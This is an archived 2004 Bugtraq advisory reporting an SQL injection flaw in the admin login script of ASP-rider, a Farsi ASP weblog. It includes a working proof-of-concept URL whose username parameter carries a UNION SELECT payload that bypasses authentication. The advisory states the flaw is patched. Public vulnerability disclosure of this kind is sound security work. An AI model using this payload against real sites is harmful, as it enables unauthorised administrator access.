[37715] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

ASP-rider is vulnerable to sql injection attack

daemon@ATHENA.MIT.EDU (shervin khaleghjou)
Tue Dec 14 17:28:41 2004

Date: 15 Dec 2004 03:23:08 -0000
Message-ID: <20041215032308.26671.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: shervin khaleghjou <oil_karchack@yahoo.com>
To: bugtraq@securityfocus.com



-------------------www.karchack.com--------------------------
-------------------www.karchack.net--------------------------


affected software decribtion :
asp-rider is a full farsi weblog written in asp
www.asp-rider.com

--------------------------------------
Vulnerabilities:
the file verify.asp in blogadmin folder is vulnerable to sql injection attack

-------------------------------------
proof of concept :
you can easily log in to the weblog administrator page by entering :
www.site.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1



-------------------------------------
this vulnerability is already patched.
www.karchack.com
www.karchack.net


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[37715] in bugtraq

ASP-rider is vulnerable to sql injection attack

daemon@ATHENA.MIT.EDU (shervin khaleghjou)Tue Dec 14 17:28:41 2004

daemon@ATHENA.MIT.EDU (shervin khaleghjou)
Tue Dec 14 17:28:41 2004